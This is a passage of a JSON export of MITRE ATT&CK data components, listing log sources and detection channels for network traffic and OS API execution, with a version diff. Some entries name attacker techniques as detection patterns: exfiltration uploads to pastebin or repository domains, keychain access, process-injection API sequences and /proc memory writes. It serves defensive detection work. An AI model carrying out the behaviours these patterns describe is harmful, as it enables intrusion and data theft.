                            "name": "esxi:vpxd",
                            "channel": "TLS session established by ESXi service to unapproved endpoint"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session records with TLS-like byte patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST requests to pastebin.com or similar"
                        },
                        {
                            "name": "NetFlow:Flow",
                            "channel": "new outbound connections from exploited process tree"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "new connections from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected route changes or duplicate gateway advertisements"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
                            "channel": "EventCode=2004, 2005, 2006"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall/PF anchor load or rule change events."
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved update hosts right after install/update"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New outbound flows to non-approved vendor hosts post install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New/rare egress to non-approved update hosts after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound HTTPS uploads to repo domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS traffic to repository domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alert log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound flow records"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "high out:in ratio or fixed-size periodic flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect or sendto system call with burst pattern"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "sudden burst in outgoing packets from same PID"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "source instance sends large volume of traffic in short window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "NIDS:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "connection attempts and data transmission logs"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "External traffic to remote access services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
                        },
                        {
                            "name": "dns:query",
                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + ssl.log with Tor fingerprinting"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "forwarded encrypted traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relayed session pathing (multi-hop)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "container-level outbound traffic events"
                        },
                        {
                            "name": "WLANLogs:Association",
                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "/var/log/syslog.log"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound UDP spikes to external reflector IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "High entropy domain queries with multiple NXDOMAINs"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "API communication"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound Connection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connection Tracking"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow Creation (NetFlow/sFlow)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, icmp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Inbound on ports 5985/5986"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid domain-to-IP resolution changes for same domain"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "uncommon ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alternate ports"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or flow data"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress log analysis"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall rule enable/disable or listen socket changes"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Historical list of associated SSIDs compared against baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress from host after new install to unknown update endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress from app just installed to unknown update endpoints"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pool upon container launch"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with RSA key exchange on unexpected port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "sustained outbound HTTPS sessions with high data volume"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS outbound uploads"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network flows to external cloud services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 22 traffic"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "port 22 access"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:32:30.362000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0078\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0078\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][155]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected location resolution events or abnormal subscriber tracking requests\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected subscriber tracking or abnormal mobility/location resolution activity\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-23 18:22:40.476000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0021",
                            "external_id": "DC0021"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "OS API Execution",
                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Base",
                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetMetadata, DescribeInstanceIdentity"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, ioctl"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "aaa privilege_exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "APCQueueOperations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
                        },
                        {
                            "name": "etw:Microsoft-Windows-RPC",
                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "API call to AddMonitor invoked by non-installer process"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "audio APIs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.securityd, com.apple.tccd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API Calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-DotNETRuntime",
                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "memory region with RWX permissions allocated"
                        },
                        {
                            "name": "snmp:trap",
                            "channel": "management queries"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Describe* or List* API calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SendMessage, PostMessage, LVM_*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sudo or pkexec invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authorization execute privilege requests"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtQueryInformationProcess"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Remote access API calls and file uploads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of modified binaries or abnormal library load sequences"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access or unlock attempt to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount system call with bind or remap flags"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Decrypt"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-File",
                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/clone/daemon syscall tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Detached process execution with no associated parent"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, mprotect, open, dlopen"
                        },
                        {
                            "name": "ETW:ProcThread",
                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "MemoryWriteToExecutable"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Security-Auditing",
                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, process_vm_writev"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of dd or sed targeting /proc/*/mem"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
                        },
                        {
                            "name": "ETW",
                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "SetFileTime"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of Calendar.set() and Calendar.add()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of AccountManager.getAccounts()"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
